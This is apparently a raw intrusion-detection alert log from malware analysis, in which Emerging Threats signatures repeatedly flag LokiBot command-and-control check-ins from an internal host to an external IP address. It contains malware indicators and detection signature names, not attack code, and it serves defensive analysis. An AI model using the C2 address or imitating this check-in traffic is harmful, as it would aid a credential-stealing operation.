                                              11/25/21-10:52:43.136376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2025381ET TROJAN LokiBot Checkin5038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2025381ET TROJAN LokiBot Checkin5038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2025381ET TROJAN LokiBot Checkin5038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2025381ET TROJAN LokiBot Checkin5038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2025381ET TROJAN LokiBot Checkin5038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2025381ET TROJAN LokiBot Checkin5038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2025381ET TROJAN LokiBot Checkin5038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2025381ET TROJAN LokiBot Checkin5038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2025381ET TROJAN LokiBot Checkin5039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2025381ET TROJAN LokiBot Checkin5039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2025381ET TROJAN LokiBot Checkin5039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2025381ET TROJAN LokiBot Checkin5039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2025381ET TROJAN LokiBot Checkin5039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2025381ET TROJAN LokiBot Checkin5039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2025381ET TROJAN LokiBot Checkin5039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2025381ET TROJAN LokiBot Checkin5039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2025381ET TROJAN LokiBot Checkin5039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2025381ET TROJAN LokiBot Checkin5039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2025381ET TROJAN LokiBot Checkin5040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2025381ET TROJAN LokiBot Checkin5040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2025381ET TROJAN LokiBot Checkin5040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2025381ET TROJAN LokiBot Checkin5040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2025381ET TROJAN LokiBot Checkin5040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2025381ET TROJAN LokiBot Checkin5040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2025381ET TROJAN LokiBot Checkin5040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2025381ET TROJAN LokiBot Checkin5040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2025381ET TROJAN LokiBot Checkin5040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2025381ET TROJAN LokiBot Checkin5040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2025381ET TROJAN LokiBot Checkin5041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2025381ET TROJAN LokiBot Checkin5041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2025381ET TROJAN LokiBot Checkin5041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2025381ET TROJAN LokiBot Checkin5041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2025381ET TROJAN LokiBot Checkin5041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2025381ET TROJAN LokiBot Checkin5041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041580192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2025381ET TROJAN LokiBot Checkin5041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2025381ET TROJAN LokiBot Checkin5041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2025381ET TROJAN LokiBot Checkin5041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2025381ET TROJAN LokiBot Checkin5041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2025381ET TROJAN LokiBot Checkin5042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2025381ET TROJAN LokiBot Checkin5042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2025381ET TROJAN LokiBot Checkin5042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2025381ET TROJAN LokiBot Checkin5042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2025381ET TROJAN LokiBot Checkin5042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2025381ET TROJAN LokiBot Checkin5042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2025381ET TROJAN LokiBot Checkin5042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2025381ET TROJAN LokiBot Checkin5042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2025381ET TROJAN LokiBot Checkin5042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2025381ET TROJAN LokiBot Checkin5042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2025381ET TROJAN LokiBot Checkin5043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2025381ET TROJAN LokiBot Checkin5043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2025381ET TROJAN LokiBot Checkin5043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2025381ET TROJAN LokiBot Checkin5043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2025381ET TROJAN LokiBot Checkin5043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2025381ET TROJAN LokiBot Checkin5043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2025381ET TROJAN LokiBot Checkin5043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2025381ET TROJAN LokiBot Checkin5043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2025381ET TROJAN LokiBot Checkin5043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2025381ET TROJAN LokiBot Checkin5043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044080192.168.11.20176.223.209.128
